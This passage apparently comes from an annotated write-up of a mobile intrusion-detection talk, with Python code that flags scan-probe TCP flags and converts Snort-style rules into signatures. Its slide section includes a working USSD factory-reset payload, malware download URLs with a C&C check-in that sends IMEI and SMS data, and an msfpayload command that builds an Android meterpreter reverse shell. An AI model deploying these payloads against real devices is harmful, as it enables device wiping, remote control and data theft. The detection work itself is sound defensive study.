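# SYN+FIN+PSH+URG, T7 sends FIN+PSH+URG. Any tool sending these shapes is caught,
# not only nmap. Order matters: the specific probe shapes are tested first.
RULES = [
    ("null scan / nmap T2", lambda f: f == 0),
    ("SYN+FIN+PSH+URG / nmap T3", lambda f: f == SYN | FIN | PSH | URG),
    ("xmas scan / nmap T7", lambda f: f == FIN | PSH | URG),
    ("SYN+FIN (mutually exclusive)", lambda f: f & SYN and f & FIN),
    ("SYN+RST (mutually exclusive)", lambda f: f & SYN and f & RST),
]


def inspect(frame: bytes) -> dict:
    """Sensor verdict for one packet: DROP plus a report line for the logging
    server, or ACCEPT."""
    pkt = parse_ipv4_tcp(frame)
    for name, match in RULES:
        if match(pkt.flags):
            return {
                "verdict": "DROP",
                "reason": name,
                "src": pkt.src,
                "report": (f"{pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport} "
                           f"flags=0x{pkt.flags:02x} win={pkt.window} ({name})"),
            }
    return {"verdict": "ACCEPT", "reason": None, "src": pkt.src, "report": None}


def iptables_block(src: str) -> str:
    """Reactive action from slide 35: the firewall rule the sensor would add."""
    return f"iptables -I INPUT -s {src} -p tcp -j DROP"


def build_frame(flags: int, window: int = 1024, sport: int = 40000, dport: int = 80) -> bytes:
    """Constructed test packet: 20-byte IPv4 header + 20-byte TCP header, checksums zero."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     bytes([192, 168, 0, 20]), bytes([192, 168, 0, 33]))
    tcp = struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, window, 0, 0)
    return ip + tcp


if __name__ == "__main__":
    for flags in (SYN, SYN | FIN | PSH | URG, 0, FIN | PSH | URG, ACK):
        r = inspect(build_frame(flags))
        print(r["verdict"], r["report"] or "")
        if r["verdict"] == "DROP":
            print("  ->", iptables_block(r["src"]))
```

These rules are stateless and cheap, which fits the "minimal overhead" requirement on slide 35, and they produce almost no false positives because no conforming stack emits these combinations. They do not identify the scanner's other probes (the ECN, IE and UDP probes, and T4-T6, all use valid packets), so a complete fingerprinting detector also needs the window-size and option signatures those probes carry.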
  • 41. PATTERN MATCHING: "I'm watching you..."
  • 42. SIGNATURE FORMAT
    - With the help of custom-built signatures, the framework can also be used to detect probes or attacks designed for mobile devices.
    - Useful signatures are available from Snort and Emerging Threats.
    - Convert Snort-like rules to a friendly format the sensor can load.
  • 44. Android 2.0 USE-AFTER-FREE REMOTE CODE EXECUTION
    - Does not properly validate floating-point data, which allows remote attackers to execute arbitrary code or cause a denial of service.
    - Executed via a crafted HTML document, so the trigger crosses the network in clear and can be matched by a content signature.
  • 45. USSD EXPLOIT
    - A USSD code is entered into a phone to perform actions.
    - They are mainly used by network operators to provide customers with easy access to pre-configured services, including:
      - call forwarding
      - balance inquiries
      - multiple SIM functions
    - The HTML code to execute such an action is as follows:
        <a href="tel:xyz">Click here to call</a>
    - Example exploit (the frame loads the tel: URI without any click; on affected Samsung devices *2767*3855# is the factory-reset code):
        <frameset> <frame src="tel:*2767*3855#" /> </frameset>
  • 46. MALWARE
    - ANDR.TROJAN.SMSSEND
      - Downloaded from:
        - hxxp://adobeflashplayer-up.ru/?a=RANDOM_CHARACTERS – 93.170.107.184
        - hxxp://googleplaynew.ru/?a=RANDOM_CHARACTERS – 93.170.107.184
        - hxxp://browsernew-update.ru/?a=RANDOM_CHARACTERS – 93.170.107.184
      - Once executed, it connects to the C&C at gaga01.net/rq.php and sends:
        board=unknown;brand=generic;device=generic;imei=XXXXXX;imsi=XXXXXX;session_id=1;operator=XXX;sms0=XXXXXX;sms1=XXXXXX;sms2=XXXXXX;time=XXXXXX;timezone=XXXXXX
      - Search pattern: rq.php
    - METERPRETER
      - It features command history, tab completion, channels, and more.
      - Let's try:
        $ msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.20 R > meter.apk
        $ file meter.apk
        meter.apk: Zip archive data, at least v2.0 to extract
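The signature conversion from slide 42, run against the indicators on slides 45 and 46, as an added example that is not code from the talk: a parser that turns Snort-style rules into a plain dict (one possible "friendly format"; the talk's own format is not shown in this extraction) and a matcher that checks every content pattern, with nocase honoured, against a TCP payload. The two rules are written for this example in Snort syntax and are not Snort or Emerging Threats rules; the HTTP payloads are constructed here from the rq.php check-in and the tel: frame shown on the slides.

```python
"""Added example, not code from the talk: convert Snort-style rules into a dict and
match their content patterns against TCP payloads. Rules and payloads are constructed
for this example from the indicators on the USSD and malware slides."""
import re

# action proto src sport dir dst dport (options)
HEADER_RE = re.compile(
    r"^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$", re.S)


def split_options(body: str) -> list:
    """Split the option body on ';' but never inside double quotes."""
    opts, cur, in_quotes = [], [], False
    for ch in body:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == ";" and not in_quotes:
            opts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    tail = "".join(cur).strip()
    if tail:
        opts.append(tail)
    return [o for o in opts if o]


def decode_content(text: str) -> bytes:
    """Snort content syntax: literal text with |xx xx| hex escapes in between."""
    out = b""
    for i, part in enumerate(text.split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode("latin-1")
    return out


def parse_rule(rule: str) -> dict:
    """Turn one Snort-style rule into the 'friendly' dict the matcher consumes."""
    m = HEADER_RE.match(rule.strip())
    if not m:
        raise ValueError("unsupported rule syntax")
    action, proto, src, sport, direction, dst, dport, body = m.groups()
    parsed = {"action": action, "proto": proto, "src": src, "sport": sport,
              "direction": direction, "dst": dst, "dport": dport,
              "msg": "", "sid": None, "contents": []}
    for opt in split_options(body):
        key, _, value = opt.partition(":")
        key, value = key.strip(), value.strip().strip('"')
        if key == "content":
            parsed["contents"].append({"pattern": decode_content(value), "nocase": False})
        elif key == "nocase" and parsed["contents"]:
            parsed["contents"][-1]["nocase"] = True   # modifies the preceding content
        elif key == "msg":
            parsed["msg"] = value
        elif key == "sid":
            parsed["sid"] = int(value)
        # rev, classtype, flow, ... are ignored by this minimal converter
    return parsed


def matches(rule: dict, payload: bytes) -> bool:
    """Every content pattern of the rule must appear in the payload."""
    if not rule["contents"]:
        return False
    for c in rule["contents"]:
        hay, needle = payload, c["pattern"]
        if c["nocase"]:
            hay, needle = hay.lower(), needle.lower()
        if needle not in hay:
            return False
    return True


def scan(payload: bytes, rules: list) -> list:
    """Return (sid, msg) for each rule that fires on this payload."""
    return [(r["sid"], r["msg"]) for r in rules if matches(r, payload)]


# Constructed rules (Snort syntax, written for this example, not Snort/ET rules).
RULE_TEXT = [
    'alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Andr.Trojan.SmsSend C&C check-in"; '
    'content:"GET "; content:"/rq.php?"; content:"imei="; nocase; sid:1000001; rev:1;)',
    'alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"USSD tel: URI served in a frame"; '
    'content:"<frame"; nocase; content:"src=|22|tel:*"; nocase; sid:1000002; rev:1;)',
]
RULES = [parse_rule(r) for r in RULE_TEXT]

# Constructed sample payloads (client check-in, attacker page, harmless request).
CNC_CHECKIN = (b"GET /rq.php?board=unknown;brand=generic;device=generic;imei=XXXXXX;"
               b"imsi=XXXXXX;session_id=1 HTTP/1.1\r\nHost: gaga01.net\r\n\r\n")
USSD_PAGE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
             b'<frameset> <frame src="tel:*2767*3855#" /> </frameset>')
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"

if __name__ == "__main__":
    for name, payload in (("check-in", CNC_CHECKIN), ("ussd", USSD_PAGE), ("benign", BENIGN)):
        print(name, scan(payload, RULES))
```

The USSD rule keys on `src="tel:*` rather than on `tel:` alone so that ordinary click-to-call links do not fire it; the `|22|` hex escape is how Snort content carries a literal double quote. Matching on reassembled payloads rather than single packets matters in practice, since a pattern split across two segments is missed by a per-packet matcher; the sensor on slide 35 inspects traffic, so it needs at least basic stream reassembly for these rules to be reliable.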
  • 47. THANK YOU! JAIME SÁNCHEZ (@SEGOFENSIVA) JSANCHEZ@SEGURIDADOFENSIVA.COM